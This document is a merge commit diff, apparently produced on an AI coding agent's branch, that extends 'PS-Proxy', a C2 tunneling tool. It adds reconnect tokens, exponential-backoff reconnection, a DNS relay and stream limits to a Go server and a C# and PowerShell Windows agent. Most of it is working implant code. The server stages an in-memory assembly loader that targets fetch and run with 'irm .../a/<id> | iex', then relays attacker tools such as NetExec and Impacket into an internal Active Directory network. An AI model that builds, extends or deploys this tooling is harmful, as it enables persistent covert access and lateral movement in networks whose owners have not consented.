Merge pull request #1 from Harrison-Wells-Cyber/codex/review-proxy-tool-for-internal-ad-environment

Add reconnect token, DNS relay, bounded streams, and agent reconnect/backoff
This commit is contained in:
Harrison-Wells-Cyber
2026-07-22 11:21:13 -07:00
committed by GitHub
9 changed files with 575 additions and 68 deletions
+12 -3
View File
@@ -96,7 +96,10 @@ sudo ./psproxy-server \
--cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \
--key /etc/letsencrypt/live/c2.example.com/privkey.pem \
--route 10.10.10.0/24 \
--redirect
--redirect \
--max-streams 256 \
--dns-listen 127.0.0.1:5353 \
--dns-target 10.10.10.10:53
```
With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and
@@ -140,7 +143,8 @@ ldapsearch -x -H ldap://127.0.0.1:1389 -D 'user@example.local' -W -b 'DC=example
Transparent redirect mode is the recommended test-environment workflow right now.
The fixed-target relay remains useful when you want a single local port mapped to
a single target for debugging.
a single target for debugging. Use `--max-streams` to cap concurrent proxied TCP
connections during high-concurrency tools such as NetExec; the default is 256. When `--dns-listen` and `--dns-target` are set together, the server exposes a UDP DNS listener and forwards raw DNS queries through the enrolled agent to the internal DNS server reachable from the agent host.
## Security notes
@@ -163,10 +167,14 @@ Implemented now:
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
- Leaf certificate pin calculation for generated agent configuration.
- Short-lived one-time staging URLs.
- One-time enrollment token validation for the raw tunnel.
- One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment.
- Agent auto-reconnect with exponential backoff for transient tunnel failures.
- Framed multiplexed stream protocol.
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
- Fixed-target TCP relay mode for protocol validation.
- Bounded concurrent stream handling with per-stream local write queues so one slow local TCP client cannot block the whole multiplexed agent session.
- Optional UDP DNS relay that forwards raw DNS queries through the agent to an internal DNS server.
- JSON `/status` endpoint for agent and stream visibility.
- C# agent stream relay that opens normal outbound `TcpClient` connections from
the Windows host.
- PowerShell loader template that loads a compressed/base64 managed assembly from
@@ -190,5 +198,6 @@ matrix that includes:
- NetExec SMB/LDAP tests;
- Impacket SMB/LDAP/RPC tests;
- reconnect and stale route cleanup tests;
- DNS relay tests against an internal AD DNS server;
- malformed frame and enrollment fuzz tests;
- certificate pin mismatch tests.
+77 -5
View File
@@ -14,38 +14,63 @@ namespace PSProxy.Agent
{
public sealed class Tunnel
{
private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7;
private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7, FrameDNSQuery = 8, FrameDNSReply = 9;
private const int MaxPayload = 1 << 20;
private readonly string server;
private readonly int port;
private readonly string certPin;
private readonly string enrollToken;
private readonly string reconnectToken;
private readonly string dnsTarget;
private readonly ConcurrentDictionary<ulong, StreamCtx> streams = new ConcurrentDictionary<ulong, StreamCtx>();
private readonly object sendLock = new object();
private SslStream tls;
private volatile bool stopping;
public Tunnel(string server, int port, string certPin, string enrollToken)
public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget)
{
this.server = server;
this.port = port;
this.certPin = NormalizeHex(certPin);
this.enrollToken = enrollToken;
this.reconnectToken = reconnectToken ?? "";
this.dnsTarget = dnsTarget ?? "";
if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string");
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
}
public void Run()
{
int delayMs = 1000;
while (!stopping)
{
try
{
RunOnce();
delayMs = 1000;
}
catch (Exception ex)
{
Console.Error.WriteLine("[ps-proxy] tunnel error: {0}", ex.Message);
CloseAllStreams();
if (stopping) break;
Thread.Sleep(delayMs);
delayMs = Math.Min(delayMs * 2, 30000);
}
}
}
private void RunOnce()
{
Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port);
using (var tcp = new TcpClient())
{
tcp.NoDelay = true;
tcp.Connect(server, port);
ConnectWithTimeout(tcp, server, port, 15000);
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
{
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
WriteAscii("PSP1\nENROLL " + enrollToken + "\n");
WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n");
Frame hello = ReadFrame();
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
Console.Error.WriteLine("[ps-proxy] enrolled and ready");
@@ -65,6 +90,7 @@ namespace PSProxy.Agent
case FrameData: HandleData(f.StreamID, f.Payload); break;
case FrameClose: CloseStream(f.StreamID, false); break;
case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break;
case FrameDNSQuery: StartDnsQuery(f.StreamID, f.Payload); break;
}
}
}
@@ -76,7 +102,7 @@ namespace PSProxy.Agent
string host; int dstPort; SplitTarget(target, out host, out dstPort);
var client = new TcpClient();
client.NoDelay = true;
client.Connect(host, dstPort);
ConnectWithTimeout(client, host, dstPort, 15000);
var ctx = new StreamCtx(sid, client);
if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); }
SendFrame(new Frame(sid, FrameOpenOK, new byte[0]));
@@ -98,6 +124,36 @@ namespace PSProxy.Agent
catch { CloseStream(sid, true); }
}
private void StartDnsQuery(ulong sid, byte[] payload)
{
var t = new Thread(delegate() { HandleDnsQuery(sid, payload); });
t.IsBackground = true;
t.Start();
}
private void HandleDnsQuery(ulong sid, byte[] payload)
{
try
{
if (String.IsNullOrWhiteSpace(dnsTarget)) throw new Exception("DNS target is not configured");
string host; int dstPort; SplitTarget(dnsTarget, out host, out dstPort);
using (var udp = new UdpClient())
{
udp.Client.ReceiveTimeout = 5000;
udp.Connect(host, dstPort);
udp.Send(payload, payload.Length);
IPEndPoint ep = null;
byte[] resp = udp.Receive(ref ep);
SendFrame(new Frame(sid, FrameDNSReply, resp));
}
}
catch (Exception ex)
{
Console.Error.WriteLine("[ps-proxy] DNS query failed: " + ex.Message);
SendFrame(new Frame(sid, FrameDNSReply, new byte[0]));
}
}
private void PumpTargetToServer(StreamCtx ctx)
{
byte[] buf = new byte[32768];
@@ -126,6 +182,11 @@ namespace PSProxy.Agent
}
}
private void CloseAllStreams()
{
foreach (ulong sid in streams.Keys) CloseStream(sid, false);
}
private void SendFrame(Frame f)
{
if (f.Payload == null) f.Payload = new byte[0];
@@ -192,6 +253,17 @@ namespace PSProxy.Agent
if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port");
}
private static void ConnectWithTimeout(TcpClient client, string host, int dstPort, int timeoutMs)
{
IAsyncResult ar = client.BeginConnect(host, dstPort, null, null);
if (!ar.AsyncWaitHandle.WaitOne(timeoutMs))
{
try { client.Close(); } catch { }
throw new TimeoutException("connect timed out: " + host + ":" + dstPort);
}
client.EndConnect(ar);
}
private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); }
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
+7 -3
View File
@@ -4,6 +4,8 @@ param(
[int]$Port = {{.Port}},
[string]$CertPin = "{{.CertPin}}",
[string]$EnrollToken = "{{.EnrollToken}}",
[string]$ReconnectToken = "{{.ReconnectToken}}",
[string]$DNSTarget = "{{.DNSTarget}}",
[switch]$NoAutoStart
)
$ErrorActionPreference = "Stop"
@@ -29,10 +31,12 @@ function Start-PSTunnel {
[Parameter(Mandatory=$true)][string]$Server,
[int]$Port = 443,
[Parameter(Mandatory=$true)][string]$CertPin,
[Parameter(Mandatory=$true)][string]$EnrollToken
[Parameter(Mandatory=$true)][string]$EnrollToken,
[string]$ReconnectToken = "",
[string]$DNSTarget = ""
)
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken)
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget)
$t.Run()
}
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken }
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget }
+248 -21
View File
@@ -5,6 +5,7 @@ import (
"crypto/sha256"
"crypto/tls"
"encoding/hex"
"encoding/json"
"encoding/pem"
"errors"
"flag"
@@ -38,6 +39,9 @@ func main() {
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent")
redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port")
maxStreams := flag.Int("max-streams", 256, "maximum concurrent proxied TCP streams")
dnsListen := flag.String("dns-listen", "", "optional UDP DNS listener that forwards queries through the agent, e.g. 127.0.0.1:5353")
dnsTarget := flag.String("dns-target", "", "DNS server reachable by the agent for --dns-listen queries, e.g. 10.10.10.10:53")
tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389")
tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389")
routes := multiFlag{}
@@ -57,9 +61,15 @@ func main() {
if (*tcpListen == "") != (*tcpTarget == "") {
log.Fatal("--tcp-listen and --tcp-target must be supplied together")
}
if (*dnsListen == "") != (*dnsTarget == "") {
log.Fatal("--dns-listen and --dns-target must be supplied together")
}
if *redirect && len(routes) == 0 {
log.Fatal("--redirect requires at least one --route CIDR")
}
if err := validateRoutes(routes); err != nil {
log.Fatal(err)
}
pin, err := certPin(*cert)
if err != nil {
log.Fatalf("certificate pin failed: %v", err)
@@ -73,14 +83,15 @@ func main() {
}
tmpl := template.Must(template.ParseFiles(*agentTemplate))
store := staging.NewStore(*ttl)
sess, err := store.Create(*domain, *port, pin)
sess, err := store.Create(*domain, *port, pin, *dnsTarget)
if err != nil {
log.Fatal(err)
}
server := NewTunnelServer(store)
server := NewTunnelServer(store, *maxStreams)
mux := http.NewServeMux()
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
mux.HandleFunc("GET /status", statusHandler(server))
var redirectCleanup func()
if *redirect {
redirectCleanup = setupRedirectOrFatal(routes, *redirectPort)
@@ -90,6 +101,9 @@ func main() {
if *tcpListen != "" {
go serveTCPRelay(*tcpListen, *tcpTarget, server)
}
if *dnsListen != "" {
go serveDNSRelay(*dnsListen, server)
}
installSignalCleanup(redirectCleanup)
addr := fmt.Sprintf("%s:%d", *listen, *port)
log.Printf("PS-Proxy Go server starting on https://%s", addr)
@@ -102,6 +116,9 @@ func main() {
if *tcpListen != "" {
log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget)
}
if *dnsListen != "" {
log.Printf("DNS relay: %s -> agent -> %s", *dnsListen, *dnsTarget)
}
log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID)
log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server))
}
@@ -111,9 +128,16 @@ type TunnelServer struct {
mu sync.Mutex
session *AgentSession
nextID atomic.Uint64
dnsID atomic.Uint64
maxStreams int
}
func NewTunnelServer(store *staging.Store) *TunnelServer { return &TunnelServer{store: store} }
func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer {
if maxStreams < 1 {
maxStreams = 1
}
return &TunnelServer{store: store, maxStreams: maxStreams}
}
func (s *TunnelServer) SetSession(a *AgentSession) {
s.mu.Lock()
@@ -127,13 +151,23 @@ func (s *TunnelServer) SetSession(a *AgentSession) {
func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session }
func (s *TunnelServer) ClearSession(a *AgentSession) {
s.mu.Lock()
if s.session == a {
s.session = nil
}
s.mu.Unlock()
}
func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) {
a := s.Current()
if a == nil {
return nil, 0, errors.New("no enrolled agent connected")
}
id := s.nextID.Add(1)
a.AttachLocal(id, local)
if err := a.AttachLocal(id, local); err != nil {
return nil, 0, err
}
if err := a.Open(id, target); err != nil {
a.RemoveLocal(id)
return nil, 0, err
@@ -149,14 +183,38 @@ type AgentSession struct {
closed chan struct{}
mu sync.Mutex
pending map[uint64]chan error
locals map[uint64]net.Conn
dnsPending map[uint64]chan []byte
locals map[uint64]*localStream
maxStreams int
}
func NewAgentSession(c net.Conn, br *bufio.Reader) *AgentSession {
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, locals: map[uint64]net.Conn{}}
func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession {
if maxStreams < 1 {
maxStreams = 1
}
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams}
}
func (a *AgentSession) Close() { a.closeOnce.Do(func() { close(a.closed); _ = a.conn.Close() }) }
func (a *AgentSession) Close() {
a.closeOnce.Do(func() {
close(a.closed)
_ = a.conn.Close()
a.mu.Lock()
for id, ch := range a.pending {
delete(a.pending, id)
ch <- errors.New("agent session closed")
}
for id, ch := range a.dnsPending {
delete(a.dnsPending, id)
close(ch)
}
for id, ls := range a.locals {
delete(a.locals, id)
ls.close()
}
a.mu.Unlock()
})
}
func (a *AgentSession) send(f protocol.Frame) error {
a.sendMu.Lock()
@@ -186,16 +244,29 @@ func (a *AgentSession) Open(id uint64, target string) error {
}
}
func (a *AgentSession) AttachLocal(id uint64, c net.Conn) {
func (a *AgentSession) AttachLocal(id uint64, c net.Conn) error {
a.mu.Lock()
a.locals[id] = c
a.mu.Unlock()
defer a.mu.Unlock()
select {
case <-a.closed:
return errors.New("agent session closed")
default:
}
if len(a.locals) >= a.maxStreams {
return fmt.Errorf("maximum concurrent streams reached: %d", a.maxStreams)
}
a.locals[id] = newLocalStream(c)
return nil
}
func (a *AgentSession) RemoveLocal(id uint64) {
a.mu.Lock()
ls := a.locals[id]
delete(a.locals, id)
a.mu.Unlock()
if ls != nil {
ls.close()
}
}
func (a *AgentSession) Run() {
@@ -225,18 +296,21 @@ func (a *AgentSession) Run() {
}
case protocol.FrameData:
a.mu.Lock()
c := a.locals[f.StreamID]
ls := a.locals[f.StreamID]
a.mu.Unlock()
if c != nil {
_, _ = c.Write(f.Payload)
if ls != nil && !ls.enqueue(f.Payload) {
a.RemoveLocal(f.StreamID)
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameClose})
}
case protocol.FrameClose:
a.RemoveLocal(f.StreamID)
case protocol.FrameDNSReply:
a.mu.Lock()
c := a.locals[f.StreamID]
delete(a.locals, f.StreamID)
ch := a.dnsPending[f.StreamID]
delete(a.dnsPending, f.StreamID)
a.mu.Unlock()
if c != nil {
_ = c.Close()
if ch != nil {
ch <- f.Payload
}
case protocol.FramePing:
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong})
@@ -244,6 +318,140 @@ func (a *AgentSession) Run() {
}
}
type localStream struct {
conn net.Conn
ch chan []byte
done chan struct{}
once sync.Once
}
func newLocalStream(c net.Conn) *localStream {
ls := &localStream{conn: c, ch: make(chan []byte, 32), done: make(chan struct{})}
go ls.writeLoop()
return ls
}
func (l *localStream) enqueue(payload []byte) bool {
buf := append([]byte(nil), payload...)
select {
case l.ch <- buf:
return true
case <-l.done:
return false
default:
return false
}
}
func (l *localStream) writeLoop() {
defer l.close()
for {
select {
case payload := <-l.ch:
if _, err := l.conn.Write(payload); err != nil {
return
}
case <-l.done:
return
}
}
}
func (l *localStream) close() {
l.once.Do(func() {
close(l.done)
_ = l.conn.Close()
})
}
func (s *TunnelServer) Status() map[string]any {
a := s.Current()
status := map[string]any{"agent_connected": a != nil, "max_streams": s.maxStreams}
if a != nil {
a.mu.Lock()
status["active_streams"] = len(a.locals)
status["pending_opens"] = len(a.pending)
status["pending_dns"] = len(a.dnsPending)
a.mu.Unlock()
}
return status
}
func (s *TunnelServer) QueryDNS(query []byte) ([]byte, error) {
a := s.Current()
if a == nil {
return nil, errors.New("no enrolled agent connected")
}
id := s.dnsID.Add(1)
ch := make(chan []byte, 1)
a.mu.Lock()
select {
case <-a.closed:
a.mu.Unlock()
return nil, errors.New("agent session closed")
default:
}
a.dnsPending[id] = ch
a.mu.Unlock()
if err := a.send(protocol.Frame{StreamID: id, Type: protocol.FrameDNSQuery, Payload: query}); err != nil {
a.mu.Lock()
delete(a.dnsPending, id)
a.mu.Unlock()
return nil, err
}
select {
case resp, ok := <-ch:
if !ok {
return nil, errors.New("agent session closed")
}
if len(resp) == 0 {
return nil, errors.New("empty DNS response from agent")
}
return resp, nil
case <-time.After(5 * time.Second):
a.mu.Lock()
delete(a.dnsPending, id)
a.mu.Unlock()
return nil, errors.New("timeout waiting for DNS response")
}
}
func statusHandler(server *TunnelServer) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json")
_ = json.NewEncoder(w).Encode(server.Status())
}
}
func serveDNSRelay(listenAddr string, server *TunnelServer) {
addr, err := net.ResolveUDPAddr("udp", listenAddr)
if err != nil {
log.Fatalf("dns relay resolve failed: %v", err)
}
conn, err := net.ListenUDP("udp", addr)
if err != nil {
log.Fatalf("dns relay listen failed: %v", err)
}
log.Printf("dns relay listening on udp://%s", listenAddr)
buf := make([]byte, 4096)
for {
n, client, err := conn.ReadFromUDP(buf)
if err != nil {
log.Printf("dns relay read failed: %v", err)
continue
}
query := append([]byte(nil), buf[:n]...)
go func() {
resp, err := server.QueryDNS(query)
if err != nil {
log.Printf("dns relay query failed: %v", err)
return
}
_, _ = conn.WriteToUDP(resp, client)
}()
}
}
func serveTransparentRelay(listenAddr string, server *TunnelServer) {
ln, err := net.Listen("tcp4", listenAddr)
if err != nil {
@@ -299,6 +507,15 @@ func originalDst(c net.Conn) (string, error) {
return target, nil
}
func validateRoutes(routes []string) error {
for _, route := range routes {
if _, _, err := net.ParseCIDR(route); err != nil {
return fmt.Errorf("invalid --route CIDR %q: %w", route, err)
}
}
return nil
}
func setupRedirectOrFatal(routes []string, port int) func() {
if os.Geteuid() != 0 {
log.Fatal("--redirect requires root so iptables NAT rules can be installed")
@@ -434,16 +651,27 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
_ = conn.Close()
return
}
if err := server.store.Enroll(strings.TrimSpace(strings.TrimPrefix(line, prefix))); err != nil {
fields := strings.Fields(strings.TrimPrefix(line, prefix))
if len(fields) == 0 {
_ = conn.Close()
return
}
enrollToken := fields[0]
reconnectToken := ""
if len(fields) > 1 {
reconnectToken = fields[1]
}
if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil {
log.Printf("agent enrollment failed: %v", err)
_ = conn.Close()
return
}
a := NewAgentSession(conn, br)
a := NewAgentSession(conn, br, server.maxStreams)
server.SetSession(a)
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
a.Run()
server.ClearSession(a)
}
type singleListener struct {
@@ -454,7 +682,6 @@ type singleListener struct {
func (s *singleListener) Accept() (net.Conn, error) {
if s.conn == nil {
<-s.done
return nil, io.EOF
}
c := s.conn
+126
View File
@@ -0,0 +1,126 @@
package main
import (
"bufio"
"net"
"testing"
"time"
"github.com/psproxy/psproxy/internal/protocol"
"github.com/psproxy/psproxy/internal/staging"
)
func TestTunnelServerMaxStreams(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 1)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
local1, remote1 := net.Pipe()
defer remote1.Close()
defer local1.Close()
if err := sess.AttachLocal(1, local1); err != nil {
t.Fatalf("first stream should attach: %v", err)
}
local2, remote2 := net.Pipe()
defer remote2.Close()
defer local2.Close()
if err := sess.AttachLocal(2, local2); err == nil {
t.Fatal("second stream should be rejected at max stream limit")
}
}
func TestLocalStreamBackpressureClosesConnection(t *testing.T) {
local, remote := net.Pipe()
defer remote.Close()
ls := newLocalStream(local)
defer ls.close()
failed := false
for i := 0; i < cap(ls.ch)+10; i++ {
if !ls.enqueue([]byte("x")) {
failed = true
break
}
}
if !failed {
t.Fatal("enqueue should eventually fail when the local write queue is full")
}
}
func TestTunnelServerQueryDNS(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
go sess.Run()
go func() {
f, err := protocol.ReadFrame(peer)
if err != nil {
return
}
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply, Payload: []byte("dns-response")})
}()
resp, err := server.QueryDNS([]byte("dns-query"))
if err != nil {
t.Fatalf("dns query failed: %v", err)
}
if string(resp) != "dns-response" {
t.Fatalf("unexpected dns response: %q", resp)
}
}
func TestValidateRoutes(t *testing.T) {
if err := validateRoutes([]string{"10.0.0.0/24", "192.168.1.10/32"}); err != nil {
t.Fatalf("valid routes rejected: %v", err)
}
if err := validateRoutes([]string{"not-a-cidr"}); err == nil {
t.Fatal("invalid CIDR should be rejected")
}
}
func TestTunnelServerQueryDNSEmptyResponseFails(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
go sess.Run()
go func() {
f, err := protocol.ReadFrame(peer)
if err != nil {
return
}
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply})
}()
if _, err := server.QueryDNS([]byte("dns-query")); err == nil {
t.Fatal("empty DNS replies should fail")
}
}
func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) {
c1, c2 := net.Pipe()
defer c1.Close()
defer c2.Close()
ln := &singleListener{conn: c1, done: make(chan struct{})}
got, err := ln.Accept()
if err != nil {
t.Fatalf("first accept failed: %v", err)
}
if got != c1 {
t.Fatal("first accept returned unexpected connection")
}
if _, err := ln.Accept(); err == nil {
t.Fatal("second accept should return EOF")
}
}
+2
View File
@@ -16,6 +16,8 @@ const (
FrameClose byte = 5
FramePing byte = 6
FramePong byte = 7
FrameDNSQuery byte = 8
FrameDNSReply byte = 9
MaxPayload = 1 << 20
)
+24 -8
View File
@@ -16,6 +16,8 @@ type Session struct {
Port int
CertPin string
EnrollToken string
ReconnectToken string
DNSTarget string
ExpiresAt time.Time
Delivered bool
Enrolled bool
@@ -25,11 +27,12 @@ type Store struct {
mu sync.Mutex
sessions map[string]*Session
tokens map[string]*Session
reconnects map[string]*Session
ttl time.Duration
}
func NewStore(ttl time.Duration) *Store {
return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, ttl: ttl}
return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, reconnects: map[string]*Session{}, ttl: ttl}
}
func NewSecret(n int) (string, error) {
@@ -40,7 +43,7 @@ func NewSecret(n int) (string, error) {
return base64.RawURLEncoding.EncodeToString(b), nil
}
func (s *Store) Create(server string, port int, certPin string) (*Session, error) {
func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) {
id, err := NewSecret(18)
if err != nil {
return nil, err
@@ -49,11 +52,16 @@ func (s *Store) Create(server string, port int, certPin string) (*Session, error
if err != nil {
return nil, err
}
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ExpiresAt: time.Now().Add(s.ttl)}
reconnect, err := NewSecret(32)
if err != nil {
return nil, err
}
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)}
s.mu.Lock()
defer s.mu.Unlock()
s.sessions[id] = sess
s.tokens[tok] = sess
s.reconnects[reconnect] = sess
return sess, nil
}
@@ -67,6 +75,7 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
if time.Now().After(sess.ExpiresAt) {
delete(s.sessions, id)
delete(s.tokens, sess.EnrollToken)
delete(s.reconnects, sess.ReconnectToken)
return nil, errors.New("enrollment expired")
}
if sess.Delivered {
@@ -76,19 +85,24 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
return sess, nil
}
func (s *Store) Enroll(token string) error {
func (s *Store) Authenticate(enrollToken, reconnectToken string) error {
s.mu.Lock()
defer s.mu.Unlock()
sess := s.tokens[token]
sess := s.reconnects[reconnectToken]
if sess != nil && sess.Enrolled {
return nil
}
sess = s.tokens[enrollToken]
if sess == nil {
return errors.New("invalid enrollment token")
}
if time.Now().After(sess.ExpiresAt) {
delete(s.sessions, sess.ID)
delete(s.tokens, token)
delete(s.tokens, enrollToken)
delete(s.reconnects, sess.ReconnectToken)
return errors.New("enrollment expired")
}
if sess.Enrolled {
if sess.Enrolled && sess.ReconnectToken != reconnectToken {
return errors.New("enrollment token already used")
}
sess.Enrolled = true
@@ -101,6 +115,8 @@ type AgentTemplateData struct {
Port int
CertPin string
EnrollToken string
ReconnectToken string
DNSTarget string
}
func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) http.HandlerFunc {
@@ -113,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt
}
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
w.Header().Set("Cache-Control", "no-store")
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken})
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget})
}
}
+49
View File
@@ -0,0 +1,49 @@
package staging
import (
"testing"
"time"
)
func TestAuthenticateAllowsReconnectTokenAfterEnrollment(t *testing.T) {
store := NewStore(time.Minute)
sess, err := store.Create("c2.example.com", 443, "pin", "10.0.0.10:53")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
t.Fatalf("reconnect failed: %v", err)
}
}
func TestAuthenticateRejectsReusedEnrollTokenWithoutReconnectToken(t *testing.T) {
store := NewStore(time.Minute)
sess, err := store.Create("c2.example.com", 443, "pin", "")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, "wrong"); err == nil {
t.Fatal("reused enrollment token without reconnect token should fail")
}
}
func TestReconnectTokenSurvivesEnrollmentURLTTL(t *testing.T) {
store := NewStore(50 * time.Millisecond)
sess, err := store.Create("c2.example.com", 443, "pin", "")
if err != nil {
t.Fatalf("create session: %v", err)
}
if err := store.Authenticate(sess.EnrollToken, sess.ReconnectToken); err != nil {
t.Fatalf("initial enrollment failed: %v", err)
}
time.Sleep(75 * time.Millisecond)
if err := store.Authenticate("", sess.ReconnectToken); err != nil {
t.Fatalf("reconnect token should survive URL TTL after enrollment: %v", err)
}
}
+2
View File
@@ -23,6 +23,8 @@ $template = $template.Replace('{{.Server}}', '__SERVER__')
$template = $template.Replace('{{.Port}}', '443')
$template = $template.Replace('{{.CertPin}}', '__CERT_PIN__')
$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__')
$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__')
[IO.File]::WriteAllText($OutFile, $template, [Text.Encoding]::UTF8)
Write-Host "Wrote $OutFile"
Write-Host "Wrote $b64Out"